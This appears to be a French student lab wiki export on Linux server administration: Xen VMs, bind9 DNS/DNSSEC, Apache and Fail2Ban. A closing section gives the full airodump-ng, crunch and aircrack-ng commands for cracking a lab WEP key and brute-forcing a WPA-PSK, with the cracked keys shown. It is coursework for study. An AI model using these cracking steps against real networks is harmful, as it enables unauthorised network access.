&amp;lt;syntaxhighlight lang=&amp;quot;shell&amp;quot;&amp;gt;&lt;br /&gt;
mkfs -t ext4 /dev/xvdb1&lt;br /&gt;
mount /dev/xvdb1 /mnt&lt;br /&gt;
mv /var/* /mnt&lt;br /&gt;
umount /mnt&lt;br /&gt;
mount -a&lt;br /&gt;
mkfs -t ext4 /dev/xvda3&lt;br /&gt;
mount -a&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Le montage des partitions est fait ! On peut par ailleurs le voir via &amp;lt;code&amp;gt;lsblk&amp;lt;/code&amp;gt;. Cependant, au redémarrage de la VM, les partitions ne seront pas automatiquement montées. Ainsi, il faut modifier le fichier &amp;lt;code&amp;gt;/etc/fstab&amp;lt;/code&amp;gt;:&amp;lt;syntaxhighlight lang=&amp;quot;shell&amp;quot;&amp;gt;&lt;br /&gt;
proc            /proc           proc    defaults        0       0&lt;br /&gt;
devpts          /dev/pts        devpts  rw,noexec,nosuid,gid=5,mode=620 0  0&lt;br /&gt;
/dev/xvda1 none swap sw 0 0&lt;br /&gt;
/dev/xvda2 / ext4 noatime,nodiratime,errors=remount-ro 0 1&lt;br /&gt;
/dev/xvda3 /var ext4 defaults 0 2&lt;br /&gt;
/dev/xvdb1 /home ext4 defaults 0 2&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Désormais, nos partitions '''var''' et '''home''' seront bien montés comme il se doit au démarrage.&lt;br /&gt;
&lt;br /&gt;
== Configuration réseau ==&lt;br /&gt;
Ajouter une configuration réseau à nos machines virtuelles est essentiel pour accéder à Internet et pour pouvoir utiliser SSH sur nos machines depuis l'extérieur. C'est ce que nous allons voir dans cette partie.&lt;br /&gt;
&lt;br /&gt;
== DNS/DNSSEC ==&lt;br /&gt;
&lt;br /&gt;
=== Prérequis ===&lt;br /&gt;
Nous devons configurer un serveur DNS, qui associe '''tompere.online''' et '''tompere2.xyz''', aux machines de services.&lt;br /&gt;
&lt;br /&gt;
Pour ce faire, nous avons commencé par louer ces noms de domaine. sur Gandi.&lt;br /&gt;
&lt;br /&gt;
Ensuite, nous avons pu télécharger les clés qui seront utiles plus tard pour configurer le DNSSEC.&lt;br /&gt;
&lt;br /&gt;
* '''.key''' : la clé privée du domaine&lt;br /&gt;
&lt;br /&gt;
* '''.csr''' : la demande de signature du certificat&lt;br /&gt;
&lt;br /&gt;
=== Configuration du paquetage bind9 ===&lt;br /&gt;
Il faut installer le paquetage &amp;lt;code&amp;gt;bind9&amp;lt;/code&amp;gt; avec &amp;lt;code&amp;gt;apt&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
Ensuite, il faut configurer un fichier de zone : &amp;lt;code&amp;gt;/etc/bind/zones/tompere2_xyz/tompere2.xyz&amp;lt;/code&amp;gt;.&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
    $TTL 400&lt;br /&gt;
    ; Zone file for tompere.online&lt;br /&gt;
    @ IN SOA ns.tompere2.xyz. postmaster.tompere2.xyz. (&lt;br /&gt;
        3703        ; Serial&lt;br /&gt;
        21600       ; Refresh (6h)&lt;br /&gt;
        3600        ; Retry (1h)&lt;br /&gt;
        2592000     ; Expire (30 days)&lt;br /&gt;
        86400       ; Negative cache (24h)&lt;br /&gt;
        )&lt;br /&gt;
&lt;br /&gt;
    ; Name servers&lt;br /&gt;
    @ IN NS ns.tompere2.xyz.&lt;br /&gt;
    @ IN NS ns.tompere.online.&lt;br /&gt;
&lt;br /&gt;
    ; AAAA records (IPv6)&lt;br /&gt;
    @   IN AAAA 2001:660:4401:60a0:216:3eff:fe3f:9410&lt;br /&gt;
    ns IN AAAA 2001:660:4401:60a0:216:3eff:fe3f:9410&lt;br /&gt;
&lt;br /&gt;
    ; A records (IPv4)&lt;br /&gt;
    ns IN A 193.48.57.168&lt;br /&gt;
    @   IN A 193.48.57.168&lt;br /&gt;
&lt;br /&gt;
    ; CNAME records&lt;br /&gt;
    www IN CNAME tompere2.xyz.&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Nous avons choisi '''ns''' comme préfixe à nos noms de domaine. Il faut veiller à bien rester cohérent en remplissant la section '''External Nameservers''' de Gandi.&lt;br /&gt;
&lt;br /&gt;
Concernant l'adresse '''IPv4''', &amp;lt;code&amp;gt;193.48.57.168&amp;lt;/code&amp;gt; est l'adresse publique de la machine mandataire, ce qui est logique car elle doit être accessible depuis l'extérieur.&lt;br /&gt;
&lt;br /&gt;
Par ailleurs, il faut bien penser à ajouter les '''permissions aux dossiers parents''' de ce fichier de zone. Sinon, des logs ''&amp;quot;Permission Denied&amp;quot;'' apparaîtront, et le DNS sera non fonctionnel.&lt;br /&gt;
&lt;br /&gt;
La syntaxe de ce fichier doit être précise, alors il est pratique de vérifier la validité du fichier via l'utilitaire &amp;lt;code&amp;gt;named-checkzone&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
Aussi, pour s'assurer que les mises à jour du fichier sont prises en compte, il faut toujours modifier le numéro de série, par exemple en l'incrémentant de 1.&lt;br /&gt;
&lt;br /&gt;
Maintenant, modifions le fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt;&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
    zone &amp;quot;tompere2.xyz&amp;quot; {&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/zones/tompere2_xyz/tompere2.xyz&amp;quot;;&lt;br /&gt;
        allow-transfer { secondaries; };  // Filtrage des secondaires&lt;br /&gt;
        also-notify { hiddensecondaries; };&lt;br /&gt;
&lt;br /&gt;
    };&lt;br /&gt;
&lt;br /&gt;
    acl &amp;quot;secondaries&amp;quot; {&lt;br /&gt;
        192.168.0.2;   // Serveur secondaire IPv4&lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fe4b:1909; // Serveur secondaire IPv6&lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fecd:2805; // Serveur mandataire IPv6&lt;br /&gt;
    };&lt;br /&gt;
&lt;br /&gt;
    masters &amp;quot;hiddensecondaries&amp;quot; {&lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fecd:2805; // Serveur mandataire IPv6&lt;br /&gt;
    };&lt;br /&gt;
&lt;br /&gt;
    zone &amp;quot;tompere.online&amp;quot;{&lt;br /&gt;
        type secondary;&lt;br /&gt;
        file &amp;quot;/etc/bind/backup/tompere&amp;quot;;&lt;br /&gt;
        primaries{ 2001:660:4401:60a0:216:3eff:fe4b:1909; };&lt;br /&gt;
    };&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Ce fichier gère qui est maître ou secondaire pour chaque domaine, où est le fichier de zone, et quels serveurs sont autorisés à recevoir ou notifier les mises à jour.&lt;br /&gt;
&lt;br /&gt;
=== Glue Record ===&lt;br /&gt;
Pour que le domaine soit accessible depuis Internet, j’ai ajouté un '''Glue Record''' sur '''Gandi'''. &lt;br /&gt;
&lt;br /&gt;
Cela permet d’associer l’adresse '''IPv4''' de la machine mandataire et l’adresse '''IPv6''' de ma machine de services aux serveurs de noms du domaine.&lt;br /&gt;
&lt;br /&gt;
* ns.tompere2.xyz&lt;br /&gt;
** IPv4 : &amp;lt;code&amp;gt;193.48.57.168&amp;lt;/code&amp;gt;&lt;br /&gt;
** IPv6 : &amp;lt;code&amp;gt;2001:660:4401:60a0:216:3eff:fe3f:9410&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== DNSSEC ===&lt;br /&gt;
Pour sécuriser le DNS et avoir un site en HTTPS, nous devons apporter quelques modifications au fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
En effet, nous allons rajouter ces lignes dans &amp;lt;code&amp;gt;zone &amp;quot;tompere2.xyz&amp;quot;&amp;lt;/code&amp;gt; &amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
notify yes;  // Notification des secondaires&lt;br /&gt;
key-directory &amp;quot;/etc/bind/keys&amp;quot;; //repertoire des keys&lt;br /&gt;
dnssec-policy &amp;quot;dnspol&amp;quot;; //utilisation d'une politique DNSSEC&lt;br /&gt;
inline-signing yes; //activation de la signature automatique&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;De plus, il faut ajouter&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
dnssec-policy &amp;quot;dnspol&amp;quot; {&lt;br /&gt;
    keys {&lt;br /&gt;
        ksk key-directory lifetime unlimited algorithm 13;&lt;br /&gt;
        zsk key-directory lifetime unlimited algorithm 13;&lt;br /&gt;
    };&lt;br /&gt;
    nsec3param;&lt;br /&gt;
};&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Ces lignes servent à définir une '''politique de signature'''. Cela indique quelles clés utiliser (KSK/ZSK), leur durée de vie et l’algorithme de signature.&lt;br /&gt;
&lt;br /&gt;
Les clés vont être créer automatiquement au redémarrage de bind, mais il faut pour cela créer un dossier &amp;lt;code&amp;gt;/bind/keys&amp;lt;/code&amp;gt;&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
mkdir /etc/bind/keys&lt;br /&gt;
chown bind:bind /etc/bind/keys&lt;br /&gt;
chmod 750 /etc/bind/keys&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Enfin, nous pouvons redémarrer bind pour vérifier la création des clés.&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
systemctl restart named&lt;br /&gt;
systemctl enable named&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Les clés sont biens générées !&lt;br /&gt;
&lt;br /&gt;
Il faut désormais '''copier la clé publique''' (.key) sur '''Gandi'''.&lt;br /&gt;
&lt;br /&gt;
Dans mon cas, j'avais 2 clés publiques .key, donc j'ai copié ces deux clés sur Gandi, mais comme nous allons voir, une seule est utile.&lt;br /&gt;
&lt;br /&gt;
Pour mieux visualiser le déploiement de notre DNS, nous pouvons utiliser deux sites bien utiles :&lt;br /&gt;
*https://dnschecker.org/&lt;br /&gt;
*https://dnsviz.net/&lt;br /&gt;
&lt;br /&gt;
&amp;lt;small&amp;gt;Remarque : Nous avons également utilisé &amp;lt;code&amp;gt;dig&amp;lt;/code&amp;gt; pour nos tests intermédiaires.&amp;lt;/small&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Le premier site, DNSChecker, nous informe si la propagation de notre DNS a eu lieu.&lt;br /&gt;
&lt;br /&gt;
Dans le cas de '''tompere2.xyz''', on voit que c'est bon, aussi bien en IPv4 qu'en IPv6.&lt;br /&gt;
[[Fichier:Déploiement IPv4.png|néant|vignette|800x800px|Le DNS a bien été déployé partout dans le monde !]]&lt;br /&gt;
[[Fichier:Déploiement DNS IPv6.png|néant|vignette|800x800px|Le DNS a bien été déployé partout dans le monde !]]&lt;br /&gt;
Le DNS marche bien ! Super !&lt;br /&gt;
&lt;br /&gt;
Il faut maintenant s'assurer que la partie sécurisée, fonctionne également.&lt;br /&gt;
&lt;br /&gt;
Rendons nous sur '''DNSViz''', un outil qui nous donnera plus d'informations à ce sujet.&lt;br /&gt;
[[Fichier:DNS Viz.png|néant|vignette|Le DNSSEC fonctionne !]]&lt;br /&gt;
Comme on le vois, le DNSSEC fonctionne ! Cela dit, une clé est inutilisée, comme indiqué sur le schéma en gris clair. Nous pouvons la supprimer de '''Gandi,''' pour rendre l'architecture plus cohérente.&lt;br /&gt;
&lt;br /&gt;
== Serveur Apache ==&lt;br /&gt;
Notre DNSSEC est désormais fonctionnel, on peut alors passer à la configuration d'une page web via &amp;lt;code&amp;gt;apache2&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
=== Objectif ===&lt;br /&gt;
L'objectif du serveur Apache sera de pouvoir servir les pages webs de nos machines de services.&lt;br /&gt;
&lt;br /&gt;
=== Réalisation ===&lt;br /&gt;
&lt;br /&gt;
==== Installation du paquet ====&lt;br /&gt;
&amp;lt;code&amp;gt;apt update&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;apt install apache2&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Paramètrage sur machine mandataire ====&lt;br /&gt;
Avant de commencer, il nous faut activer quelques modules permettant le bon fonctionnement d'Apache.&lt;br /&gt;
&lt;br /&gt;
*&amp;lt;code&amp;gt;a2enmod ssl&amp;lt;/code&amp;gt; : active le module SSL pour permettre les connexions sécurisées en '''HTTPS (TLS)''' avec certificats.&lt;br /&gt;
&lt;br /&gt;
*&amp;lt;code&amp;gt;a2enmod proxy&amp;lt;/code&amp;gt; : active les fonctionnalités de '''reverse proxy''', permettant à Apache de rediriger les requêtes vers un autre serveur.&lt;br /&gt;
&lt;br /&gt;
*&amp;lt;code&amp;gt;a2enmod proxy_http&amp;lt;/code&amp;gt; : active le support du proxy pour le protocole '''HTTP.'''&lt;br /&gt;
&lt;br /&gt;
Sur la machine mandataire, nous avons créé et rempli le fichier &amp;lt;code&amp;gt;/etc/apache2/sites-available/000-tompere2.xyz-ssl.conf&amp;lt;/code&amp;gt;&amp;lt;syntaxhighlight lang=&amp;quot;vim&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
    ServerName ns.tompere2.xyz&lt;br /&gt;
    Redirect permanent / https://tompere2.xyz/    &lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
    ServerName tompere2.xyz&lt;br /&gt;
    ServerAlias tompere2.xyz&lt;br /&gt;
    DocumentRoot /var/www/html/&lt;br /&gt;
    CustomLog /var/log/apache2/secure_access.log combined&lt;br /&gt;
&lt;br /&gt;
    SSLEngine on&lt;br /&gt;
    SSLCertificateFile /etc/ssl/certs/tompere2.xyz.crt&lt;br /&gt;
    SSLCertificateKeyFile /etc/ssl/private/tompere2.xyz.key&lt;br /&gt;
    SSLCertificateChainFile /etc/ssl/certs/tompere2.xyz.pem&lt;br /&gt;
    SSLVerifyClient None&lt;br /&gt;
    SSLProxyEngine on&lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Ce fichier permet à la machine mandataire de gérer l’accès au site '''tompere2.xyz'''.&lt;br /&gt;
&lt;br /&gt;
Dans le fichier &amp;lt;code&amp;gt;/var/www/html/index.html&amp;lt;/code&amp;gt;, nous avons modifié le titre pour pouvoir visualiser que les changements étaient bien pris en considération.&amp;lt;syntaxhighlight lang=&amp;quot;html&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;title&amp;gt;Tom et Aurele Page: It works&amp;lt;/title&amp;gt;&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Résultat ====&lt;br /&gt;
Finalement, nous obtenons bien un accès au site '''tompere2.xyz''' avec le nouveau titre ![[Fichier:Mon site web.png|néant|vignette|Photo de mon site tompere2.xyz]]&lt;br /&gt;
&lt;br /&gt;
== Fail2Ban ==&lt;br /&gt;
&lt;br /&gt;
=== Contexte et objectifs ===&lt;br /&gt;
Les machines '''exposées en SSH''' sur Internet sont constamment ciblées par des '''attaques automatisées''' qui enchaînent des milliers de tentatives de '''connexion par force brute''' afin de deviner des identifiants. Il est donc essentiel de mettre en place un système comme '''Fail2ban pour détecte'''r ces tentatives répétées '''et bloquer''' automatiquement les adresses IP malveillantes.&lt;br /&gt;
&lt;br /&gt;
=== Réalisation ===&lt;br /&gt;
&lt;br /&gt;
==== Installation du paquet ====&lt;br /&gt;
&amp;lt;code&amp;gt;apt update&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;apt install fail2ban&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Définition du Fail2Ban ====&lt;br /&gt;
Dans le fichier &amp;lt;code&amp;gt;/etc/fail2ban/jail.local&amp;lt;/code&amp;gt; de la '''machine mandataire''', nous pouvons définir la façon dont le fail2ban va agir.&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
[sshd]&lt;br /&gt;
enabled = true&lt;br /&gt;
port = ssh&lt;br /&gt;
filter = sshd&lt;br /&gt;
ignoreip = 127.0.0.1&lt;br /&gt;
findtime = 10m&lt;br /&gt;
bantime = 5m&lt;br /&gt;
maxretry = 3&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Désormais, nous sommes protégés contre les tentatives de brute force par SSH. En effet, au bout de 3 échecs consécutifs, l'utilisateur malveillant est banni temporairement.&lt;br /&gt;
&lt;br /&gt;
== Effraction WiFi ==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
&lt;br /&gt;
==== Adresse MAC de cracotte10 ====&lt;br /&gt;
Pour trouver l'adresse MAC de cracotte10, nous pouvons utiliser &amp;lt;code&amp;gt;airodump-ng&amp;lt;/code&amp;gt;. Pour ce faire, nous devons tout d'abord trouver le '''nom de la carte réseau'''. On peut trouver cela via &amp;lt;code&amp;gt;ip link&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
J'obtiens alors &amp;lt;code&amp;gt;wlan0&amp;lt;/code&amp;gt;, mais pour augmenter la vitesse de cassage, nous utiliserons une clé USB Wi-Pi qui nous attribuera le &amp;lt;code&amp;gt;wlx40a5efd2140c&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ensuite, on scanne grâce à:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo airodump-ng wlx40a5efd2140c --essid cracotte10&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous obtenons :&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID&lt;br /&gt;
&lt;br /&gt;
04:DA:D2:9C:50:59  -69        2        1    0   4   54e. WEP  WEP         cracotte10              &lt;br /&gt;
&lt;br /&gt;
BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;L'adresse '''MAC de cracotte10''' est donc&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;04:DA:D2:9C:50:59&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Récupération de données ====&lt;br /&gt;
Une fois '''l'adresse mac et le canal récupérés''', nous pouvons récupérer un flux de données qui sera stocké dans un fichier &amp;lt;code&amp;gt;.cap&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo airodump-ng -c 4 --bssid 04:DA:D2:9C:50:59 wlx40a5efd2140c --write dump&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Cassage de la clef WEP ====&lt;br /&gt;
Pendant que le fichier se remplit, on peut vérifier régulièrement si la clef a été trouvée.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo aircrack-ng -b 04:DA:D2:9C:50:58 *.cap&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Si le programme réussit, nous '''obtenons la clef !'''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;KEY FOUND!   [ 55:55:55:55:5A:BC:11:CB:A4:44:44:44:44]&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
Désormais, nous voulons la clef WPA-PSK. Nous savons que cette clef est composée de 8 chiffres. Ainsi, la méthode sera de tester toutes les combinaisons possibles.&lt;br /&gt;
&lt;br /&gt;
==== Adresse MAC de kracotte10 ====&lt;br /&gt;
Nous obtenons l'adresse MAC grâce à:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo airodump-ng wlx40a5efd2140c --essid kracotte10&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous obtenons :&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID&lt;br /&gt;
&lt;br /&gt;
 44:AD:D9:5F:87:09  -67        4        0    0  13   54e. WPA2 CCMP   PSK  kracotte10              &lt;br /&gt;
&lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;L'adresse '''MAC de kracotte10''' est donc&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;44:AD:D9:5F:87:09&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Dictionnaire ====&lt;br /&gt;
Pour casser le mot de passe par force brute, il nous faut toutes les combinaisons possibles. Le paquetage &amp;lt;code&amp;gt;crunch&amp;lt;/code&amp;gt; est l'outil parfait dans notre cas.&lt;br /&gt;
&lt;br /&gt;
Nous pouvons générer toutes ces combinaisons dans un fichier texte en faisant :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;crunch 8 8 0123456789 -o 8numbers_dico.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Handshake ====&lt;br /&gt;
Maintenant que nous avons l'adresse MAC et le dictionnaire, il nous faut un handshake, nous pouvons faire :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo airodump-ng -c 13 --bssid 44:AD:D9:5F:87:09 wlx40a5efd2140c --write dump&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Cassage de la clef WPA-PSK ====&lt;br /&gt;
Une fois avoir attendu quelques minutes, il suffit de lancer la commande suivante:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo aircrack-ng -w 8numbers_dico.txt -b 44:AD:D9:5F:87:09 dump-01.cap&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Cette commande va tester toutes les lignes du fichier texte. Dans notre cas, comme il y a 10 000 000 de possiblités, il faudra attendre une trentaine de minutes avant de trouver la clef.&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
	                               Aircrack-ng 1.7&lt;br /&gt;
&lt;br /&gt;
      [00:31:37] 66625424/100000000 keys tested (34611.27 k/s)&lt;br /&gt;
&lt;br /&gt;
      Time left: 16 minutes, 4 seconds                          66.63%&lt;br /&gt;
&lt;br /&gt;
                           KEY FOUND! [ 66680666 ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
      Master Key     : 67 BB 05 71 A9 6D E4 5C 11 65 42 F7 BD 81 F1 7E&lt;br /&gt;
                       CD 69 8F FE F3 CD 2A 64 9D F1 74 7B 4D F0 CA 65&lt;br /&gt;
&lt;br /&gt;
      Transient Key  : 45 9C CA 1B 45 A8 DA C5 1A 82 BF F5 C4 FF AF 01&lt;br /&gt;
                       FE CD F8 A4 21 38 1A 58 BB C5 DE BA 00 5B BF 2A&lt;br /&gt;
                       03 66 AF 4B 36 A8 B8 C4 B4 30 62 BB 30 73 DA 00&lt;br /&gt;
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00&lt;br /&gt;
&lt;br /&gt;
      EAPOL HMAC     : 48 08 73 07 B7 6C 9C FA 3A F1 58 DD 49 93 4C 3E&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Sécurisation et accès WiFi par WPA2-EAP ==&lt;/div&gt;</summary>
		<author><name>Tmerien</name></author>
	</entry>
	<entry>
		<id>https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E10&amp;diff=12348</id>
		<title>Atelier SysRes SE4 2025/2026 E10</title>
		<link rel="alternate" type="text/html" href="https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E10&amp;diff=12348"/>
		<updated>2026-02-23T00:16:45Z</updated>

		<summary type="html">&lt;p&gt;Tmerien : /* Machines virtuelles */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Informations utiles ==&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|+&lt;br /&gt;
!Machine&lt;br /&gt;
!Nom&lt;br /&gt;
!Site web&lt;br /&gt;
!IPv4 publique&lt;br /&gt;
|-&lt;br /&gt;
|Ma machine de service&lt;br /&gt;
|TomPere2&lt;br /&gt;
|tompere2.xyz&lt;br /&gt;
|''NA''&lt;br /&gt;
|-&lt;br /&gt;
|Machine de service d'Aurèle&lt;br /&gt;
|TomPere1&lt;br /&gt;
|tompere.online&lt;br /&gt;
|''NA''&lt;br /&gt;
|-&lt;br /&gt;
|Machine mandataire&lt;br /&gt;
|TomPere0&lt;br /&gt;
|''NA''&lt;br /&gt;
|193.48.57.168&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== Machines virtuelles ==&lt;br /&gt;
&lt;br /&gt;
=== Prérequis ===&lt;br /&gt;
Tout d'abord, nous devons nous connecter à ''CapBreton'' pour pouvoir y créer nos machines virtuelles.&amp;lt;syntaxhighlight lang=&amp;quot;shell&amp;quot;&amp;gt;&lt;br /&gt;
ssh root@capbreton&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Ensuite, nous utiliserons l'hyperviseur de machine virtuelle Xen pour créer nos VMs.&lt;br /&gt;
&lt;br /&gt;
=== Création ===&lt;br /&gt;
Voici la commande permettant de créer ma machine de service. A noter que l'on était initialiement sur la distribution Excalibur, mais nous avons finalement changé pour Daedalus.&amp;lt;syntaxhighlight lang=&amp;quot;shell&amp;quot;&amp;gt;&lt;br /&gt;
xen-create-image --hostname=SE4-TomPere2 --dhcp --bridge=pont_pere --dir=/usr/local/xen --size=10GB --dist=daedalus --memory=2048M --force&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Utilisation ===&lt;br /&gt;
Maintenant que nous avons une machine virtuelle créer, il faut la démarrer et s'y connecter ! C'est ce que permettent les deux commandes suivantes.&lt;br /&gt;
&lt;br /&gt;
== Configuration réseau ==&lt;br /&gt;
&lt;br /&gt;
== DNS/DNSSEC ==&lt;br /&gt;
&lt;br /&gt;
=== Prérequis ===&lt;br /&gt;
Nous devons configurer un serveur DNS, qui associe '''tompere.online''' et '''tompere2.xyz''', aux machines de services.&lt;br /&gt;
&lt;br /&gt;
Pour ce faire, nous avons commencé par louer ces noms de domaine. sur Gandi.&lt;br /&gt;
&lt;br /&gt;
Ensuite, nous avons pu télécharger les clés qui seront utiles plus tard pour configurer le DNSSEC.&lt;br /&gt;
&lt;br /&gt;
* '''.key''' : la clé privée du domaine&lt;br /&gt;
&lt;br /&gt;
* '''.csr''' : la demande de signature du certificat&lt;br /&gt;
&lt;br /&gt;
=== Configuration du paquetage bind9 ===&lt;br /&gt;
Il faut installer le paquetage &amp;lt;code&amp;gt;bind9&amp;lt;/code&amp;gt; avec &amp;lt;code&amp;gt;apt&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
Ensuite, il faut configurer un fichier de zone : &amp;lt;code&amp;gt;/etc/bind/zones/tompere2_xyz/tompere2.xyz&amp;lt;/code&amp;gt;.&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
    $TTL 400&lt;br /&gt;
    ; Zone file for tompere.online&lt;br /&gt;
    @ IN SOA ns.tompere2.xyz. postmaster.tompere2.xyz. (&lt;br /&gt;
        3703        ; Serial&lt;br /&gt;
        21600       ; Refresh (6h)&lt;br /&gt;
        3600        ; Retry (1h)&lt;br /&gt;
        2592000     ; Expire (30 days)&lt;br /&gt;
        86400       ; Negative cache (24h)&lt;br /&gt;
        )&lt;br /&gt;
&lt;br /&gt;
    ; Name servers&lt;br /&gt;
    @ IN NS ns.tompere2.xyz.&lt;br /&gt;
    @ IN NS ns.tompere.online.&lt;br /&gt;
&lt;br /&gt;
    ; AAAA records (IPv6)&lt;br /&gt;
    @   IN AAAA 2001:660:4401:60a0:216:3eff:fe3f:9410&lt;br /&gt;
    ns IN AAAA 2001:660:4401:60a0:216:3eff:fe3f:9410&lt;br /&gt;
&lt;br /&gt;
    ; A records (IPv4)&lt;br /&gt;
    ns IN A 193.48.57.168&lt;br /&gt;
    @   IN A 193.48.57.168&lt;br /&gt;
&lt;br /&gt;
    ; CNAME records&lt;br /&gt;
    www IN CNAME tompere2.xyz.&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Nous avons choisi '''ns''' comme préfixe à nos noms de domaine. Il faut veiller à bien rester cohérent en remplissant la section '''External Nameservers''' de Gandi.&lt;br /&gt;
&lt;br /&gt;
Concernant l'adresse '''IPv4''', &amp;lt;code&amp;gt;193.48.57.168&amp;lt;/code&amp;gt; est l'adresse publique de la machine mandataire, ce qui est logique car elle doit être accessible depuis l'extérieur.&lt;br /&gt;
&lt;br /&gt;
Par ailleurs, il faut bien penser à ajouter les '''permissions aux dossiers parents''' de ce fichier de zone. Sinon, des logs ''&amp;quot;Permission Denied&amp;quot;'' apparaîtront, et le DNS sera non fonctionnel.&lt;br /&gt;
&lt;br /&gt;
La syntaxe de ce fichier doit être précise, ainsi, il est pratique de vérifier la validité du fichier via l'utilitaire &amp;lt;code&amp;gt;named-checkzone&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
Aussi, pour s'assurer que les mises à jour du fichier sont prises en compte, il faut toujours modifier le numéro de série, par exemple en l'incrémentant de 1.&lt;br /&gt;
&lt;br /&gt;
